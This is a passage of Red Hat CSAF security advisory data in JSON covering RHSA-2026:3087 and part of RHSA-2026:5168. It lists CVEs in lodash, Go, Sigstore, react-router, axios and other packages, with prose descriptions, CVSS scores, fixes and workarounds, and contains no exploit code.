"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T13:35:49+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3087"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: prototype pollution in _.unset and _.omit functions"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T13:35:49+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3087"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-66564",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2025-12-04T23:01:11.786030+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2419054"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Sigstore Timestamp Authority. This vulnerability allows a denial of service via excessive memory allocation when processing a specially crafted Object Identifier or Content-Type header.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/sigstore/timestamp-authority: Sigstore Timestamp Authority: Denial of Service via excessive OID or Content-Type header parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat products. The Sigstore Timestamp Authority, a service for issuing RFC 3161 timestamps, is prone to excessive memory allocation. This occurs when processing untrusted OID payloads with many period characters or malformed Content-Type headers. An unauthenticated attacker could exploit this flaw to trigger a denial of service in affected Red Hat products that utilize this component.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-66564"
},
{
"category": "external",
"summary": "RHBZ#2419054",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2419054"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-66564",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66564"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-66564",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66564"
},
{
"category": "external",
"summary": "https://github.com/sigstore/timestamp-authority/commit/0cae34e197d685a14904e0bad135b89d13b69421",
"url": "https://github.com/sigstore/timestamp-authority/commit/0cae34e197d685a14904e0bad135b89d13b69421"
},
{
"category": "external",
"summary": "https://github.com/sigstore/timestamp-authority/security/advisories/GHSA-4qg8-fj49-pxjh",
"url": "https://github.com/sigstore/timestamp-authority/security/advisories/GHSA-4qg8-fj49-pxjh"
}
],
"release_date": "2025-12-04T22:37:13.307000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T13:35:49+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3087"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/sigstore/timestamp-authority: Sigstore Timestamp Authority: Denial of Service via excessive OID or Content-Type header parsing"
},
{
"cve": "CVE-2026-22029",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-01-10T04:01:03.694749+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428412"
}
],
"notes": [
{
"category": "description",
"text": "A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "RHBZ#2428412",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428412"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-22029",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22029"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx",
"url": "https://github.com/remix-run/react-router/security/advisories/GHSA-2w69-qvjg-hvjx"
}
],
"release_date": "2026-01-10T02:42:32.736000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T13:35:49+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3087"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-23T13:35:49+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:3087"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:9178c9d48b3e6ac76f4f74b7bb60f450a5076de937ee8843e19cf4749449ecd8_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:e7ee88dd498d337304db3d90f4f352e55114475dbc9d75c3b18a49a249492b1e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:5168
Vulnerability from csaf_redhat - Published: 2026-03-19 19:18 - Updated: 2026-04-16 11:08A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.
A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).
A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a "none" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat Quay 3.9.19 is now available with bug fixes.",
"title": "Topic"
},
{
"category": "general",
"text": "Quay 3.9.19",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5168",
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25990",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27628",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27904",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28802",
